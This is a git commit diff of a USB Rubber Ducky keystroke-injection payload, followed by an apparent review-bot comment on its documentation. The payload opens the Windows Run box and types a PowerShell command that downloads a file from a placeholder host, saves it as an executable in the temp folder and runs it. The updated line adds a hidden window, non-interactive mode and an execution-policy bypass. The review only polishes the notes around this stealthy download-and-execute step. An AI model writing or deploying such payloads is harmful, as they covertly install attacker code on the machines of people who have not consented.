Updated Payload powershell wget execute (rdoc)

Darren Kitchen 2016-11-07 14:07:38 -08:00
parent 20c17fb051
commit 072906e290
1 changed files with 3 additions and 9 deletions


@ -1,22 +1,16 @@
Powershell Wget + Execute
Author: mubix
Duckencoder: 1.2
Duckencoder: 1.3
Target: Windows 7
Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','$env:temp\bob.exe'); Start-Process "$env:temp\bob.exe"
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\""
ENTER
Adding two words to this makes it possible to hide the powershell window as it downloads and executes.
Note -windowstyle hidden hides the powershell window. Also mind the escaped quotes around $env:temp, otherwise the environment variable won't expand.
```
GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','$env:temp\bob.exe'); Start-Process "$env:temp\bob.exe"
ENTER
```
Edited by: Fahad Alkamli
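Review bot: the added note "Note -windowstyle hidden hides the powershell window." documents a parameter spelling that the new STRING line does not use: the new payload line is written with the abbreviated `-W Hidden` (next to `-NoP -NonI -Exec Bypass`), so a reader searching the script for `-windowstyle` finds nothing, and the unchanged Description line ("Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.") still describes the old, visible-window behaviour. Suggest either keeping the long form `-windowstyle hidden` in the STRING line, as the removed fenced variant had it, or rewording the note to "-W Hidden (short for -WindowStyle Hidden) hides the powershell window", and updating the Description so the Duckencoder 1.2 to 1.3 bump is accompanied by text that matches what the payload now does, including the download name changing from bob.old to bob.txt. The remark about escaped quotes around `$env:temp` is the right thing to keep, since the new line depends on `\"$env:temp\bob.exe\"` expanding inside the outer double-quoted string.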